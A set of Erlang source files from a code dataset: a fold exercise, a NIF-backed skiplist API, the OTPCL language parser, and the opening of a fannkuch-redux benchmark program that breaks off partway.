%foldl(F, X, L) -> (lists:foldr(fun(X, G) -> fun(A) -> G(F(X, A)) end end, fun(X) -> X end, L))(X).
%Another implementation of foldl using foldr.
%myfoldl collapses the first two elements into one via foldFirstPair and
%repeats until a single value remains.
myfoldl(_, [X]) -> X;
myfoldl(F, L) ->
Once = foldFirstPair(F, L), myfoldl(F, [Once] ++ tl(tl(L))).
%Applies F to the first two elements of the list only.  The foldr step
%function ignores both of its arguments and simply recurses on a shorter
%prefix, so foldr here merely drives the recursion towards the
%two-element base case (at the cost of repeated re-evaluation).
foldFirstPair(F, [A, B]) -> F(A, B);
foldFirstPair(F, L) ->
Last = lists:last(L),
Drop = lists:droplast(L),
lists:foldr(fun(_, _) -> foldFirstPair(F, Drop) end, Last, Drop).
%-------------------------------------------------------------------------------------------------------------------------%
%foldr using foldl.
%NOTE(review): argument order differs from lists:foldr/3 -- the step
%function receives the folded tail first: foldr(F, [A, B, C]) evaluates
%to F(F(C, B), A).  Crashes on lists shorter than two elements.
foldr(F, [A, B]) -> lists:foldl(F, A, [B]);
foldr(F, [H | T]) -> F(foldr(F, T), H).
%-------------------------------------------------------------------------------------------------------------------------%
%Though it seems that foldl consumes the list from the start, actually it runs backwards.
%f ( ... (f (f (f (f z x1) x2) x3) x4) ...) xn where f a b is f(a,b).
%And foldr consumes the list from the end.
%f x1 (f x2 (f x3 (f x4 ... (f xn z) ... ))) where f a b is f(a,b).
%foldl is tail recursive whereas foldr recurses into an argument.
%As it is lazy,i.e result is not calculated until it is needed,
%therefore foldr sometimes works on infinite lists.
%Universal nature of foldr.
%foldr(_, V, []) -> V;
%foldr(f, V, [H|T]) -> f(H, foldr(f, V, T)).
%The universal property of fold is that you get a bi-implication between the two equations -> g (List) = fold(f,v,List).
%It means that there could be different ways to go through elements of the list and perform some operation
%but they all are in fact same and fold is at its root. Thus being universal in nature.
%-------------------------------------------------------------------------------------------------------------------------% | FP-Erlang/Week 6/Assignment 5/Praveen/assign5.erl | 0.573559 | 0.582966 | assign5.erl | starcoder |
%% @doc API for interacting with a skiplist
-module(skiplist).
-export([
new/0,
with_capacity/1,
push_front/2,
pop_front/1,
push_back/2,
pop_back/1,
len/1,
clear/1,
is_empty/1,
insert/3,
front/1,
back/1,
nth/2,
remove/2,
to_list/1,
contains/2,
dedup/1,
modify/3
]).
%% @doc Create a new empty skiplist.
%% Delegates to the NIF; the returned reference identifies a mutable,
%% NIF-owned structure.
new() ->
    skiplist_nif:new_skiplist().
%% @doc Create a new skiplist with specific `Capacity'.
-spec with_capacity(Capacity :: pos_integer()) -> {ok, reference()} | {error, any()}.
with_capacity(Capacity) ->
skiplist_nif:with_capacity_skiplist(Capacity).
%% @doc Push `Value' to the front of the skiplist.
%% Mutates the NIF-owned structure in place.
-spec push_front(Skiplist :: reference(), Value :: integer()) -> ok | {error, any()}.
push_front(Skiplist, Value) ->
skiplist_nif:push_front_skiplist(Skiplist, Value).
%% @doc Pop from front of the skiplist. Mutates the existing skiplist.
-spec pop_front(Skiplist :: reference()) -> {ok, integer()} | {error, any()}.
pop_front(Skiplist) ->
skiplist_nif:pop_front_skiplist(Skiplist).
%% @doc Push `Value' to the back of the skiplist.
%% Mutates the NIF-owned structure in place.
-spec push_back(Skiplist :: reference(), Value :: integer()) -> ok | {error, any()}.
push_back(Skiplist, Value) ->
skiplist_nif:push_back_skiplist(Skiplist, Value).
%% @doc Pop from back of the skiplist. Mutates the existing skiplist.
-spec pop_back(Skiplist :: reference()) -> {ok, integer()} | {error, any()}.
pop_back(Skiplist) ->
skiplist_nif:pop_back_skiplist(Skiplist).
%% @doc Return length of the skiplist.
-spec len(Skiplist :: reference()) -> non_neg_integer().
len(Skiplist) ->
skiplist_nif:len_skiplist(Skiplist).
%% @doc Empties the skiplist.
%% Mutates the NIF-owned structure in place.
-spec clear(Skiplist :: reference()) -> ok | {error, any()}.
clear(Skiplist) ->
skiplist_nif:clear_skiplist(Skiplist).
%% @doc Returns `true' if the skiplist is empty, `false' otherwise.
-spec is_empty(Skiplist :: reference()) -> boolean().
is_empty(Skiplist) ->
    %% len/1 always returns an integer, so use exact equality (=:=) and
    %% avoid the numeric coercion of ==.
    ?MODULE:len(Skiplist) =:= 0.
%% @doc Get the value from the front of the skiplist. Does not mutate the skiplist.
-spec front(Skiplist :: reference()) -> {ok, integer()} | {error, any()}.
front(Skiplist) ->
skiplist_nif:front_skiplist(Skiplist).
%% @doc Get the value from the back of the skiplist. Does not mutate the skiplist.
-spec back(Skiplist :: reference()) -> {ok, integer()} | {error, any()}.
back(Skiplist) ->
skiplist_nif:back_skiplist(Skiplist).
%% @doc Get the value at the `nth' index of the skiplist. Does not mutate the skiplist.
%% NOTE(review): the bounds checks in remove/2 and insert/3 imply 0-based
%% indexing throughout this module -- confirm against the NIF.
-spec nth(Skiplist :: reference(), Index :: non_neg_integer()) -> {ok, integer()} | {error, any()}.
nth(Skiplist, Index) ->
skiplist_nif:get_skiplist(Skiplist, Index).
%% @doc Remove the value at the specified index of the skiplist. Mutates the skiplist.
%% Valid indices are 0..len-1 (the >= check below rejects index == len).
-spec remove(Skiplist :: reference(), Index :: non_neg_integer()) ->
{ok, integer()} | {error, any()}.
remove(Skiplist, Index) ->
case Index >= ?MODULE:len(Skiplist) of
true -> {error, index_out_of_bounds};
false -> skiplist_nif:remove_skiplist(Skiplist, Index)
end.
%% @doc Insert `Value' at the `Index' of the skiplist.
%% Valid insertion positions are 0..len (index == len appends).
-spec insert(Skiplist :: reference(), Value :: integer(), Index :: non_neg_integer()) ->
ok | {error, any()}.
insert(Skiplist, Value, Index) ->
case Index > ?MODULE:len(Skiplist) of
true -> {error, index_out_of_bounds};
false -> skiplist_nif:insert_skiplist(Skiplist, Value, Index)
end.
%% @doc Convert the skiplist reference to an Erlang list.
%% Indexing in this module is 0-based (see the bounds checks in remove/2
%% and insert/3), so iterate 0..Len-1: the previous seq(1, Len) silently
%% dropped the first element and probed one index past the end.  Failed
%% lookups are still skipped, preserving the best-effort semantics.
-spec to_list(Skiplist :: reference()) -> [integer()].
to_list(Skiplist) ->
    Len = ?MODULE:len(Skiplist),
    lists:reverse(
        lists:foldl(
            fun(I, Acc) ->
                case ?MODULE:nth(Skiplist, I) of
                    {ok, Value} -> [Value | Acc];
                    {error, _} -> Acc
                end
            end,
            [],
            lists:seq(0, Len - 1)
        )
    ).
%% @doc Checks whether the skiplist contains the given `Value'.
-spec contains(Skiplist :: reference(), Value :: integer()) -> boolean().
contains(Skiplist, Value) ->
skiplist_nif:contains_skiplist(Skiplist, Value).
%% @doc Removes consecutive duplicates items from the skiplist. Mutates the skiplist.
-spec dedup(Skiplist :: reference()) -> ok.
dedup(Skiplist) ->
skiplist_nif:dedup_skiplist(Skiplist).
%% @doc Modify the skiplist and insert `Value' at the given `Index'.
%% NOTE(review): unlike insert/3, no bounds check is performed here;
%% presumably the NIF validates `Index' -- confirm.
-spec modify(Skiplist :: reference(), Value :: integer(), Index :: non_neg_integer()) ->
ok | {error, any()}.
modify(Skiplist, Value, Index) ->
skiplist_nif:modify_skiplist(Skiplist, Value, Index). | src/skiplist.erl | 0.609408 | 0.460774 | skiplist.erl | starcoder |
% @doc OTPCL's parser.
%
% Unlike most Erlang-derived languages, OTPCL's parser is not based on
% leex/yecc; rather, it's written by hand (as a side note: the author has no
% idea exactly what sort of parser OTPCL's parser actually is, though "recursive
% descent" sounds approximately right, given that it's recursive and it
% descends; someone who actually went to college is welcome to try to make sense
% of this module and provide a better explanation of what sort of parser it
% implements). The parser is (as far as the author can surmise) linear and
% relatively efficient, albeit only because it "cheats" by punting some things
% to the interpreter (notably: the parser treats numbers as atoms, so the
% interpreter is required to reparse atoms if it wants to be able to interpret
% them as numbers).
%
% == Syntax ==
%
% A "free" character is a character that is neither escaped (i.e. immediately
% preceded by a backslash character, provided that backslash character is itself
% "free") nor already part of a lower-level construct.
%
% A program is a list of statements separated by contiguous sequences of free
% vertical whitespace characters or semicolons.
%
% A statement is a list of words separated by contiguous sequences of free
% horizontal whitespace characters (escaped vertical whitespace characters are
% considered to be horizontal whitespace characters). Statements may be treated
% as "commands" in certain contexts (e.g. commands are specifically the
% top-level children of a program).
%
% A word is a braced string, double-quoted string, backquoted charlist,
% single-quoted atom, braced variable, unquoted variable, function call, list,
% tuple, comment, pipe, or unquoted atom.
%
% A braced string is a free opening curly brace, followed by zero or more
% characters and/or braced strings, followed by a free closing curly brace.
% That is: a braced string can be inside a braced string (and curly braces not
% intended to begin/end an inner braced string should be escaped with an
% immediately-preceding backslash).
%
% A double-quoted string is a free double-quote, followed by zero or more
% characters, followed by a free double-quote.
%
% A backquoted charlist is a free backquote, followed by zero or more
% characters, followed by a free backquote.
%
% A single-quoted atom is a free single-quote, followed by zero or more
% characters, followed by a free single-quote.
%
% A braced variable is a free dollar-sign, followed by a braced string.
%
% An unquoted variable is a free dollar-sign, followed by a contiguous sequence
% of characters, terminated by the next free whitespace, semicolon, or (when
% expected by the parser) closing parenthesis, square bracket, angle bracket, or
% curly brace. Unquoted variables may not contain free opening parentheses,
% square brackets, angle brackets, or curly braces; if encountered, the parser
% will immediately return an error (this may change in the future).
%
% A function call is a free opening square bracket, followed by a statement,
% followed by a free closing square bracket. It is currently an error for a
% function call to contain more or less than one statement (this may change in
% the future).
%
% A list is a free opening parenthesis, followed by a statement (note: the
% statement is treated purely as a list of words), followed by a free closing
% parenthesis. It is currently an error for a list to contain more than one
% statement (this will change in the future).
%
% A tuple is a free opening angle bracket, followed by a statement (note: the
% statement is treated purely as a list of words), followed by a free closing
% angle bracket. It is currently an error for a tuple to contain more than one
% statement (this will change in the future).
%
% A comment is a free octothorpe, followed by a contiguous sequence of
% characters, terminated by the next vertical whitespace character. A comment
% terminates the statement in which it is encountered.
%
% A pipe is a free pipe character, followed optionally by a contiguous sequence
% of characters, terminated by the next free whitespace. The pipe itself is
% parsed as an unquoted atom, which becomes the first word in a new statement.
%
% An unquoted atom is a contiguous sequence of characters, terminated by the
% next free whitespace, semicolon, or (when expected by the parser) closing
% parenthesis, square bracket, angle bracket, or curly brace. Unquoted atoms
% may not contain free opening parentheses, square brackets, angle brackets, or
% curly braces; if encountered, the parser will immediately return an error
% (this may change in the future).
%
% == Output ==
%
% OTPCL's parser does not emit the same exact structures as Erlang's parser
% (that is: it does not generate Erlang-compatible parse trees). This was
% probably a mistake (and may very well change, notably because it'd presumably
% make OTPCL compilation easier by just piggybacking on the existing
% Erlang-oriented infrastructure), but it works well enough for now.
%
% === Tokens ===
%
% The lexer makes no attempt to actually classify different types of characters
% (unlike Erlang's lexer); thus, each "token" is simply `{Char, Pos={F,L,C}}',
% where `Char' is a character code point and `Pos' is the position of that
% character (that is, `Char' came from column `C' of line `L' of file
% `F').
%
% === Trees ===
%
% The syntax tree the parser emits is a recursive 3-element tuple of the form
% `{parsed, Type, Branches}', where `Type' is an atom and `Branches' is a list
% of either tokens or trees. By default (i.e. when calling parse/1), the root
% of the tree will be a `program', with `command' and/or `comment' branches
% (`pipe's are also parsed at this level, but the parser converts those to
% `command's).
-module(otpcl_parse).
-include("otpcl.hrl").
-export([scan/1, scan/2, parse/1, parse/2, initpos/0, initpos/1]).
%% Compile-time debug tracing: expands to io:format/2 when built with
%% -DDEBUG, and to the no-op 'ok' otherwise.
-ifdef(DEBUG).
-define(DEBUG_PRINT(Msg, Args), io:format(Msg, Args)).
-else.
-define(DEBUG_PRINT(Msg, Args), ok).
-endif.
%% I don't know if this really counts as "lexing", but it does
%% associate every character with a line/column, which means parse/3
%% doesn't need to care about it. Probably not memory-optimal,
%% though.
-spec scan(str_or_bin()) -> [token()].
% @doc Converts a string into a list of tokens.
scan(Txt) ->
scan(Txt, [], initpos()).
-spec scan(str_or_bin(), position()) -> [token()].
% @doc Converts a string into a list of tokens, starting at the specified
% position.
scan(Txt, Pos) ->
scan(Txt, [], Pos).
-spec scan(str_or_bin(), [token()], position()) -> [token()].
% Worker clause set: binaries are converted to char lists first; each
% character is paired with its current position, and the position is
% advanced per character (nextpos/2 handles line/column bookkeeping).
scan(Txt, Acc, Pos) when is_binary(Txt) ->
scan(binary_to_list(Txt), Acc, Pos);
scan([], Acc, _) ->
lists:reverse(Acc);
scan([Char|Rem], Acc, Pos) ->
scan(Rem, [{Char, Pos}|Acc], nextpos(Char, Pos)).
%% This is where the fun begins
-spec parse(str_or_bin()) -> parse_success() | parse_error().
% @doc Like parse/2, but defaulting to `program' as the toplevel parse tree
% element.
parse(Input) ->
parse([program], Input).
-spec parse([level(),...], str_or_bin()) -> parse_success() | parse_error().
% @doc Attempts to parse either a string or token list.  Returns either a
% success response `{ok, Tree, Rem}' (where `Tree' is an OTPCL parse tree and
% `Rem' is whatever characters were left over) or an error response (see the
% parse_error() type for its shape).
parse(Lvls, Input) ->
% Raw text is tokenized first; token lists are parsed directly.
case is_text(Input) of
true -> parse(Lvls, scan(Input), []);
_ -> parse(Lvls, Input, [])
end.
%% I ain't got the fancy schmancy college edumacation to know the
%% *right* terminology for how parsers/lexers work, but here's the
%% terminology I'm using for the conventions below:
%%
%% TOKEN: do something upon matching a specific token
%% TPAIR: do something upon matching a specific pair of tokens
%% ANY: do something upon matching any token
%% EOF: do something upon running out of input tokens
%%
%% DROP: don't store the next token anywhere
%% TAKE: put the token in the current level's accumulator
%% KEEP: put the token back into the current level's remainder
%% EXIT: stop parsing the current level and either...
%% OK: ...return the resulting node or...
%% ERROR: ...return an error with the reason and accumulator
%%
%% SWITCH: replace the current level (useful for dispatching node
%% subtypes)
%% DESCEND: start a new level, then stick the resulting node in the
%% current level's accumulator
%% FLATTEN: append the current level's grandchildren (plus the
%% specified characters at the front and end) to its
%% accumulator
%% ESCAPED: the current token is an unescaped backslash, so drop it
%% and use the next token instead (usually for a TAKE)
%% TOKEN_DROP: discard the matched token and keep parsing at this level.
-define(TOKEN_DROP(Lvl, Char),
parse(Lvls = [Lvl|_], [{Char,_}|Rem], Acc) ->
?DEBUG_PRINT("~p: dropping token ~p\n", [Lvl, Char]),
parse(Lvls, Rem, Acc)).
%% TPAIR_DROP: discard a specific two-token sequence.
-define(TPAIR_DROP(Lvl, First, Second),
parse(Lvls = [Lvl|_], [{First,_}|[{Second,_}|Rem]], Acc) ->
?DEBUG_PRINT("~p: dropping token pair ~p/~p\n",
[Lvl, First, Second]),
parse(Lvls, Rem, Acc)).
%% TOKEN_DROP_SWITCH: discard the token and replace the current level.
-define(TOKEN_DROP_SWITCH(Old, Char, New),
parse([Old|Up], [{Char,_}|Rem], Acc) ->
?DEBUG_PRINT("~p: dropping token ~p and switching to ~p\n",
[Old, Char, New]),
parse([New|Up], Rem, Acc)).
%% TOKEN_TAKE_DESCEND: consume the token, parse a child level, and add
%% the resulting child node to this level's accumulator.
-define(TOKEN_TAKE_DESCEND(Lvl, Char, SubLvl),
parse(Lvls = [Lvl|_], [{Char,_}|Rem], Acc) ->
?DEBUG_PRINT("~p: taking token ~p and descending to ~p\n",
[Lvl, Char, SubLvl]),
case parse([SubLvl|Lvls], Rem) of
{ok, Child, NewRem} ->
parse(Lvls, NewRem, [Child|Acc]);
Error ->
Error
end).
%% TOKEN_KEEP_DESCEND: like TOKEN_TAKE_DESCEND, but the trigger token is
%% left in the stream for the child level to consume.
-define(TOKEN_KEEP_DESCEND(Lvl, Char, SubLvl),
parse(Lvls = [Lvl|_], Tokens = [{Char,_}|_], Acc) ->
?DEBUG_PRINT("~p: leaving token ~p for descent to ~p\n",
[Lvl, Char, SubLvl]),
case parse([SubLvl|Lvls], Tokens) of
{ok, Child, NewRem} ->
parse(Lvls, NewRem, [Child|Acc]);
Error ->
Error
end).
%% TOKEN_TAKE_ESCAPED: upon an unescaped backslash followed by the given
%% token, drop the backslash and take the escaped token itself.
%% Fix: scan/3 produces tokens of the form {Char, Pos}, so the backslash
%% must be matched as the tagged token {$\\,_}; the previous bare $\\
%% pattern could never match a token list, leaving all ESCAPED clauses
%% dead and breaking in-string escapes.
-define(TOKEN_TAKE_ESCAPED(Lvl, Char),
        parse(Lvls = [Lvl|_], [{$\\,_}|[T={Char,_}|Rem]], Acc) ->
            ?DEBUG_PRINT("~p: taking escaped token ~p\n", [Lvl, Char]),
            parse(Lvls, Rem, [T|Acc])).
%% TOKEN_TAKE_DESCEND_FLATTEN: consume an opening token, parse the child
%% level, then splice the child's grandchild tokens -- bracketed by the
%% opening and (synthesized) closing tokens -- directly into this level's
%% accumulator instead of nesting a child node.
-define(TOKEN_TAKE_DESCEND_FLATTEN(Lvl, Start, SubLvl, End),
parse(Lvls = [Lvl|_], [SChar = {Start,_}|Rem], Acc) ->
?DEBUG_PRINT("~p: taking token ~p for flat descent into ~p "
++ "with ending token ~p\n",
[Lvl, Start, SubLvl, End]),
case parse([SubLvl|Lvls], Rem) of
{ok, {parsed,_,Inner}, NewRem} ->
case NewRem of
[{_,RemPos}|_] ->
EChar = {End,nextpos(End,RemPos)},
NewAcc = [EChar] ++ lists:reverse(Inner)
++ [SChar] ++ Acc,
parse(Lvls, NewRem, NewAcc);
[] ->
{error, {expected, End}, Lvl, NewRem,
lists:reverse(Inner) ++ [SChar] ++ Acc}
end;
Error ->
Error
end).
%% TOKEN_EXIT_OK: the token terminates this level; consume it and return
%% the finished node.
-define(TOKEN_EXIT_OK(Lvl, Char),
parse([Lvl|_], [{Char,_}|Rem], Acc) ->
?DEBUG_PRINT("~p: token ~p is a valid exit point\n",
[Lvl, Char]),
{ok, {parsed, Lvl, lists:reverse(Acc)}, Rem}).
%% TOKEN_EXIT_ERROR: the token is illegal here; abort with Reason.
-define(TOKEN_EXIT_ERROR(Lvl, Char, Reason),
parse([Lvl|_], Rem = [{Char,_}|_], Acc) ->
?DEBUG_PRINT("~p: token ~p is an invalid exit point\n",
[Lvl, Char]),
{error, Reason, Lvl, Rem, Acc}).
%% TOKEN_KEEP_EXIT_OK: terminate this level but leave the token in the
%% stream for the parent level to handle.
-define(TOKEN_KEEP_EXIT_OK(Lvl, Char),
parse([Lvl|_], Tokens = [{Char,_}|_], Acc) ->
?DEBUG_PRINT("~p: token ~p is a valid exit point; leaving for "
++ "parent\n", [Lvl, Char]),
{ok, {parsed, Lvl, lists:reverse(Acc)}, Tokens}).
%% TPAIR_EXIT_OK: a two-token sequence terminates this level; consume it.
-define(TPAIR_EXIT_OK(Lvl, First, Second),
parse([Lvl|_], [{First,_}|[{Second,_}|Rem]], Acc) ->
?DEBUG_PRINT("~p: token pair ~p/~p is a valid exit point\n",
[Lvl, First, Second]),
{ok, {parsed, Lvl, lists:reverse(Acc)}, Rem}).
%% TPAIR_KEEP_EXIT_OK: a two-token sequence terminates this level but is
%% left in the stream for the parent.
-define(TPAIR_KEEP_EXIT_OK(Lvl, First, Second),
parse([Lvl|_], Tokens = [{First,_}|[{Second,_}|_]], Acc) ->
?DEBUG_PRINT("~p: token pair ~p/~p is a valid exit point; "
++ "leaving for parent\n", [Lvl, First, Second]),
{ok, {parsed, Lvl, lists:reverse(Acc)}, Tokens}).
%% TPAIR_DROP_SWITCH: discard a two-token sequence and replace the level.
-define(TPAIR_DROP_SWITCH(Old, First, Second, New),
parse([Old|Up], [{First,_}|[{Second,_}|Rem]], Acc) ->
?DEBUG_PRINT("~p: dropping token pair ~p/~p and switching to "
++ "~p\n", [Old, First, Second, New]),
parse([New|Up], Rem, Acc)).
%% EOF_EXIT_OK: running out of input is a valid way to end this level.
-define(EOF_EXIT_OK(Lvl),
parse([Lvl|_], [], Acc) ->
?DEBUG_PRINT("~p: EOF is a valid exit point\n", [Lvl]),
{ok, {parsed, Lvl, lists:reverse(Acc)}, []}).
%% EOF_EXIT_ERROR: running out of input here is an error (e.g. an
%% unterminated quoted construct).
-define(EOF_EXIT_ERROR(Lvl, Reason),
parse([Lvl|_], [], Acc) ->
?DEBUG_PRINT("~p: EOF is an invalid exit point\n", [Lvl]),
{error, Reason, Lvl, [], Acc}).
%% ANY_KEEP_DESCEND: unconditionally parse a child level from the current
%% stream and accumulate the resulting node.
-define(ANY_KEEP_DESCEND(Lvl, SubLvl),
parse(Lvls = [Lvl|_], Tokens, Acc) ->
?DEBUG_PRINT("~p: unconditionally descending into ~p\n",
[Lvl, SubLvl]),
case parse([SubLvl|Lvls], Tokens) of
{ok, Child, Rem} ->
parse(Lvls, Rem, [Child|Acc]);
Error ->
Error
end).
%% ANY_KEEP_SWITCH: unconditionally replace the current level.
-define(ANY_KEEP_SWITCH(Old, New),
parse([Old|Up], Tokens, Acc) ->
?DEBUG_PRINT("~p: unconditionally switching into ~p\n",
[Old, New]),
parse([New|Up], Tokens, Acc)).
%% ANY_TAKE: unconditionally consume the next token into the accumulator.
-define(ANY_TAKE(Lvl),
parse(Lvls = [Lvl|_], [T|Rem], Acc) ->
?DEBUG_PRINT("~p: unconditionally taking token ~p\n", [Lvl,T]),
parse(Lvls, Rem, [T|Acc])).
-spec parse([level(),...], [token()], [tree()] | [token()]) ->
parse_success() | parse_error().
?EOF_EXIT_OK(program);
?TOKEN_TAKE_DESCEND(program, $#, comment);
?TOKEN_KEEP_DESCEND(program, $|, pipe);
?TOKEN_DROP(program, $\s);
?TOKEN_DROP(program, $\t);
?ANY_KEEP_DESCEND(program, command);
?EOF_EXIT_OK(command);
?TOKEN_EXIT_OK(command, $\n);
?TOKEN_EXIT_OK(command, $;);
?TOKEN_KEEP_EXIT_OK(command, $#);
?TOKEN_KEEP_EXIT_OK(command, $|);
?TPAIR_DROP(command, $\\, $\n);
?TPAIR_DROP(command, $\\, $;);
?TOKEN_DROP(command, $\s);
?TOKEN_DROP(command, $\t);
?ANY_KEEP_DESCEND(command, word);
?TOKEN_EXIT_OK(word, $\s);
?TOKEN_EXIT_OK(word, $\t);
?TOKEN_EXIT_OK(word, $\n);
?TOKEN_EXIT_OK(word, $;);
?TOKEN_KEEP_EXIT_OK(word, $#);
?TOKEN_KEEP_EXIT_OK(word, $|);
?TOKEN_DROP_SWITCH(word, ${, braced);
?TOKEN_EXIT_ERROR(word, $}, {unexpected, $}});
?TOKEN_DROP_SWITCH(word, $", double_quoted);
?TOKEN_DROP_SWITCH(word, $`, backquoted);
?TOKEN_DROP_SWITCH(word, $', single_quoted);
?TPAIR_DROP_SWITCH(word, $$, ${, var_braced);
?TOKEN_DROP_SWITCH(word, $$, var_unquoted);
?TOKEN_DROP_SWITCH(word, $[, funcall);
?TOKEN_EXIT_ERROR(word, $], {unexpected, $]});
?TOKEN_DROP_SWITCH(word, $(, list);
?TOKEN_EXIT_ERROR(word, $), {unexpected, $)});
?TOKEN_DROP_SWITCH(word, $<, tuple);
?TOKEN_EXIT_ERROR(word, $>, {unexpected, $>});
?ANY_KEEP_SWITCH(word, unquoted);
?EOF_EXIT_OK(comment);
?TOKEN_EXIT_OK(comment, $\n);
?ANY_TAKE(comment);
?EOF_EXIT_OK(pipe);
?TOKEN_KEEP_DESCEND(pipe, $|, unquoted);
?ANY_KEEP_SWITCH(pipe, command);
?EOF_EXIT_ERROR(braced, {expected, $}});
?TOKEN_EXIT_OK(braced, $});
?TOKEN_TAKE_DESCEND_FLATTEN(braced, ${, braced, $});
?TOKEN_TAKE_ESCAPED(braced, ${);
?TOKEN_TAKE_ESCAPED(braced, $});
?TOKEN_TAKE_ESCAPED(braced, $\\);
?ANY_TAKE(braced);
?EOF_EXIT_ERROR(double_quoted, {expected, $"});
?TOKEN_EXIT_OK(double_quoted, $");
?TOKEN_TAKE_ESCAPED(double_quoted, $");
?TOKEN_TAKE_ESCAPED(double_quoted, $\\);
?ANY_TAKE(double_quoted);
?EOF_EXIT_ERROR(backquoted, {expected, $`});
?TOKEN_EXIT_OK(backquoted, $`);
?TOKEN_TAKE_ESCAPED(backquoted, $`);
?TOKEN_TAKE_ESCAPED(backquoted, $\\);
?ANY_TAKE(backquoted);
?EOF_EXIT_ERROR(single_quoted, {expected, $'});
?TOKEN_EXIT_OK(single_quoted, $');
?TOKEN_TAKE_ESCAPED(single_quoted, $');
?TOKEN_TAKE_ESCAPED(single_quoted, $\\);
?ANY_TAKE(single_quoted);
?EOF_EXIT_OK(unquoted);
?TOKEN_EXIT_OK(unquoted, $\s);
?TOKEN_EXIT_OK(unquoted, $\t);
?TOKEN_KEEP_EXIT_OK(unquoted, $\n);
?TPAIR_KEEP_EXIT_OK(unquoted, $\\, $\n);
?TOKEN_KEEP_EXIT_OK(unquoted, $;);
?TOKEN_KEEP_EXIT_OK(unquoted, $]);
?TOKEN_KEEP_EXIT_OK(unquoted, $));
?TOKEN_KEEP_EXIT_OK(unquoted, $>);
?TOKEN_EXIT_ERROR(unquoted, $[, {unexpected, $[});
?TOKEN_EXIT_ERROR(unquoted, $(, {unexpected, $(});
?TOKEN_EXIT_ERROR(unquoted, $<, {unexpected, $<});
?TOKEN_TAKE_ESCAPED(unquoted, $\s);
?TOKEN_TAKE_ESCAPED(unquoted, $\t);
?TOKEN_TAKE_ESCAPED(unquoted, $\\);
?TOKEN_TAKE_ESCAPED(unquoted, $;);
?TOKEN_TAKE_ESCAPED(unquoted, $[);
?TOKEN_TAKE_ESCAPED(unquoted, $]);
?TOKEN_TAKE_ESCAPED(unquoted, $();
?TOKEN_TAKE_ESCAPED(unquoted, $));
?TOKEN_TAKE_ESCAPED(unquoted, $<);
?TOKEN_TAKE_ESCAPED(unquoted, $>);
?ANY_TAKE(unquoted);
?EOF_EXIT_OK(var_unquoted);
?TOKEN_EXIT_OK(var_unquoted, $\s);
?TOKEN_EXIT_OK(var_unquoted, $\t);
?TOKEN_KEEP_EXIT_OK(var_unquoted, $\n);
?TPAIR_KEEP_EXIT_OK(var_unquoted, $\\, $\n);
?TOKEN_KEEP_EXIT_OK(var_unquoted, $;);
?TOKEN_KEEP_EXIT_OK(var_unquoted, $]);
?TOKEN_KEEP_EXIT_OK(var_unquoted, $));
?TOKEN_KEEP_EXIT_OK(var_unquoted, $>);
?TOKEN_EXIT_ERROR(var_unquoted, $[, {unexpected, $[});
?TOKEN_EXIT_ERROR(var_unquoted, $(, {unexpected, $(});
?TOKEN_EXIT_ERROR(var_unquoted, $<, {unexpected, $<});
?TOKEN_TAKE_ESCAPED(var_unquoted, $\s);
?TOKEN_TAKE_ESCAPED(var_unquoted, $\t);
?TOKEN_TAKE_ESCAPED(var_unquoted, $\\);
?TOKEN_TAKE_ESCAPED(var_unquoted, $;);
?TOKEN_TAKE_ESCAPED(var_unquoted, $[);
?TOKEN_TAKE_ESCAPED(var_unquoted, $]);
?TOKEN_TAKE_ESCAPED(var_unquoted, $();
?TOKEN_TAKE_ESCAPED(var_unquoted, $));
?TOKEN_TAKE_ESCAPED(var_unquoted, $<);
?TOKEN_TAKE_ESCAPED(var_unquoted, $>);
?ANY_TAKE(var_unquoted);
?EOF_EXIT_ERROR(var_braced, {expected, $'});
?TOKEN_EXIT_OK(var_braced, $});
?TOKEN_TAKE_DESCEND_FLATTEN(var_braced, ${, braced, $});
?TOKEN_TAKE_ESCAPED(var_braced, ${);
?TOKEN_TAKE_ESCAPED(var_braced, $});
?TOKEN_TAKE_ESCAPED(var_braced, $\\);
?ANY_TAKE(var_braced);
?EOF_EXIT_ERROR(funcall, {expected, $]});
?TOKEN_EXIT_OK(funcall, $]);
?TOKEN_EXIT_ERROR(funcall, $\n, {unimplemented, progcalls});
?TPAIR_DROP(funcall, $\\, $\n);
?TOKEN_DROP(funcall, $\s);
?TOKEN_DROP(funcall, $\t);
?ANY_KEEP_DESCEND(funcall, word);
?EOF_EXIT_ERROR(list, {expected, $)});
?TOKEN_EXIT_OK(list, $));
?TOKEN_EXIT_ERROR(list, $\n, {unimplemented, tables});
?TPAIR_DROP(list, $\\, $\n);
?TOKEN_DROP(list, $\s);
?TOKEN_DROP(list, $\t);
?ANY_KEEP_DESCEND(list, word);
?EOF_EXIT_ERROR(tuple, {expected, $>});
?TOKEN_EXIT_OK(tuple, $>);
?TOKEN_EXIT_ERROR(tuple, $\n, {unimplemented, matrices});
?TPAIR_DROP(tuple, $\\, $\n);
?TOKEN_DROP(tuple, $\s);
?TOKEN_DROP(tuple, $\t);
?ANY_KEEP_DESCEND(tuple, word);
parse(Lvls, Rem, Acc) ->
{error, {unexpected, other}, Lvls, Rem, Acc}.
-spec initpos() -> position().
%% @doc Column 0 of row 0 of the placeholder file `nofile'.
initpos() ->
    initpos(nofile).

-spec initpos(any()) -> position().
%% @doc Column 0 of row 0 of file `Filename'.
initpos(Filename) ->
    {Filename, 0, 0}.
-spec nextpos(char(), position()) -> position().
%% @doc Advance a position by one character: a newline moves to column 0
%% of the next row; any other character moves one column to the right.
nextpos(Char, {File, Row, Col}) ->
    case Char of
        $\n -> {File, Row + 1, 0};
        _ -> {File, Row, Col + 1}
    end.
-spec is_text(str_or_bin()) -> boolean().
%% @doc True if `Txt' is a binary or a character list; false otherwise.
%% Uses `orelse' rather than `or' so the list-walking character check is
%% skipped entirely when the cheap binary test already succeeded.
is_text(Txt) ->
    is_binary(Txt) orelse io_lib:char_list(Txt).
% The Computer Language Benchmarks Game
% https://salsa.debian.org/benchmarksgame-team/benchmarksgame/
%%
%% Contributed by : <NAME> and <NAME>, 13 Nov 2010
%% erlc fannkuchredux.erl
%% erl -smp enable -noshell -run fannkuchredux main 12
-module(fannkuchredux).
-compile([native, {hipe, [o3]}]).
-export([main/1]).
%% @doc Entry point. Called from the command line with a single string
%% argument (computes, prints, then halts the VM), or programmatically
%% with an integer N > 0, returning {MaxFlips, Checksum}.
main([Arg]) ->
    main(list_to_integer(Arg)),
    halt(0);
main(N) when N > 0 ->
    {MaxFlips, Checksum} =
        case N of
            1 -> {0, 0};
            _Other ->
                %% Split the N! permutations into N chunks of (N-1)!
                %% each, one worker process per chunk.
                Chunk = fact(N - 1),
                divide(0, N, lists:seq(1, N), Chunk),
